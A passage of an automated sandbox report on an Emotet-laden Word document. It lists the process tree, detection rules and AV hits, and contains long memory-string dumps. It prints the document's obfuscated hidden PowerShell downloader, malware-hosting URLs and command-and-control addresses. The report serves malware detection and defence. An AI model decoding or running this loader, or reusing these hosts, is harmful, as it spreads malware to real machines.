awA7ACQASQA3AGEAYgB6ADYAZwA9ACgAJwBMACcAKwAoACcAdQBoACcAKwAnAGYAbgBxAGsAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFcAXwA2ADIAZgB5ADYAPQAoACcASQAnACsAJwB4AHEAJwArACgAJwBmACcAKwAnADQAOQBsACcAKQApAA== MD5: 95000560239032BC68B4C2FDFCDEF913)
      • rundll32.exe (PID: 6760 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1 MD5: 73C519F050C20580F8A62C849D49215A)
        • rundll32.exe (PID: 6728 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • rundll32.exe (PID: 6960 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ezfa\bvb.lli',RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • svchost.exe (PID: 7136 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6008 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5616 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000004.00000002.689082292.00000271130C0000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
    • 0x2ba:$s1: POwersheLL
    00000004.00000003.685190093.000002712B8A4000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
    • 0x5b0:$s1: POwersheLL
    • 0x45c0:$s1: POwersheLL
    00000008.00000002.922478242.0000000000F20000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000004.00000002.700514213.000002712B630000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
      • 0x191c:$s1: POwersheLL
      Click to see the 6 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      8.2.rundll32.exe.f20000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
        8.2.rundll32.exe.f40000.2.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
          6.2.rundll32.exe.1090000.2.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
            6.2.rundll32.exe.1070000.1.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              6.2.rundll32.exe.1070000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                Click to see the 1 entries

                Sigma Overview

                System Summary:

                barindex
                Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
                Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJwArACcAMwBzACcAKwAoACgAJwAyACkAJwApACkAKwAoACgAJwAoA

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Antivirus detection for URL or domainShow sources
                Source: https://www.isatechnology.com/training/b/Avira URL Cloud: Label: malware
                Source: http://transfersuvan.com/wp-admin/OVl/Avira URL Cloud: Label: malware
                Source: http://arquivopop.com.br/index_htm_files/Kxh/Avira URL Cloud: Label: malware
                Source: https://cairocad.com/cgi-bin/1PBB/Avira URL Cloud: Label: malware
                Source: http://ownitconsignment.com/files/b/Avira URL Cloud: Label: malware
                Multi AV Scanner detection for domain / URLShow sources
                Source: isatechnology.comVirustotal: Detection: 7%Perma Link
                Multi AV Scanner detection for dropped fileShow sources
                Source: C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dllMetadefender: Detection: 52%Perma Link
                Source: C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dllReversingLabs: Detection: 96%
                Multi AV Scanner detection for submitted fileShow sources
                Source: v22Pc0qA.doc.docVirustotal: Detection: 72%Perma Link
                Source: v22Pc0qA.doc.docMetadefender: Detection: 44%Perma Link
                Source: v22Pc0qA.doc.docReversingLabs: Detection: 86%
                Machine Learning detection for dropped fileShow sources
                Source: C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dllJoe Sandbox ML: detected
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F593E4 CryptDecodeObjectEx,

                Compliance:

                barindex
                Uses new MSVCR DllsShow sources
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
                Uses secure TLS version for HTTPS connectionsShow sources
                Source: unknownHTTPS traffic detected: 194.209.195.106:443 -> 192.168.2.4:49742 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.208.182.43:443 -> 192.168.2.4:49744 version: TLS 1.2
                Binary contains paths to debug symbolsShow sources
                Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmp
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4A461 FindFirstFileW,
                Source: global trafficDNS query: name: physio-svdh.ch
                Source: global trafficTCP traffic: 192.168.2.4:49742 -> 194.209.195.106:443
                Source: global trafficTCP traffic: 192.168.2.4:49742 -> 194.209.195.106:443
                Source: global trafficTCP traffic: 192.168.2.4:49773 -> 50.116.111.59:8080
                Source: Joe Sandbox ViewIP Address: 97.120.3.198 97.120.3.198
                Source: Joe Sandbox ViewIP Address: 97.120.3.198 97.120.3.198
                Source: Joe Sandbox ViewIP Address: 50.116.111.59 50.116.111.59
                Source: Joe Sandbox ViewASN Name: CENTURYLINK-US-LEGACY-QWESTUS CENTURYLINK-US-LEGACY-QWESTUS
                Source: Joe Sandbox ViewASN Name: GOOGLE-2US GOOGLE-2US
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: global trafficHTTP traffic detected: POST /hzctvbal94fl2bqa/ HTTP/1.1DNT: 0Referer: 173.249.20.233/hzctvbal94fl2bqa/Content-Type: multipart/form-data; boundary=------------------eWKPCakCSQtYkd9BaQUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 173.249.20.233:443Content-Length: 8516Connection: Keep-AliveCache-Control: no-cache
                Source: unknownTCP traffic detected without corresponding DNS query: 97.120.3.198
                Source: unknownTCP traffic detected without corresponding DNS query: 97.120.3.198
                Source: unknownTCP traffic detected without corresponding DNS query: 97.120.3.198
                Source: unknownTCP traffic detected without corresponding DNS query: 70.180.33.202
                Source: unknownTCP traffic detected without corresponding DNS query: 70.180.33.202
                Source: unknownTCP traffic detected without corresponding DNS query: 70.180.33.202
                Source: unknownTCP traffic detected without corresponding DNS query: 50.116.111.59
                Source: unknownTCP traffic detected without corresponding DNS query: 50.116.111.59
                Source: unknownTCP traffic detected without corresponding DNS query: 50.116.111.59
                Source: unknownTCP traffic detected without corresponding DNS query: 173.249.20.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.249.20.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.249.20.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.249.20.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.249.20.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.249.20.233
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F414E6 InternetReadFile,
                Source: svchost.exe, 0000000F.00000003.750703911.00000279643DD000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.facebook.com (Facebook)
                Source: svchost.exe, 0000000F.00000003.750703911.00000279643DD000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.twitter.com (Twitter)
                Source: svchost.exe, 0000000F.00000003.750584532.00000279643EB000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-01-28T09:10:05.3582025Z||.||5328ddc5-b339-498a-8e19-ab9110f64f21||1152921505693002334||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                Source: svchost.exe, 0000000F.00000003.750584532.00000279643EB000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-01-28T09:10:05.3582025Z||.||5328ddc5-b339-498a-8e19-ab9110f64f21||1152921505693002334||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                Source: svchost.exe, 0000000F.00000003.750703911.00000279643DD000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI",A equals www.facebook.com (Facebook)
                Source: svchost.exe, 0000000F.00000003.750703911.00000279643DD000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI",A equals www.twitter.com (Twitter)
                Source: svchost.exe, 0000000F.00000003.750703911.00000279643DD000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE@o equals www.facebook.com (Facebook)
                Source: svchost.exe, 0000000F.00000003.750703911.00000279643DD000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE@o equals www.twitter.com (Twitter)
                Source: svchost.exe, 0000000F.00000003.742084704.00000279643D8000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 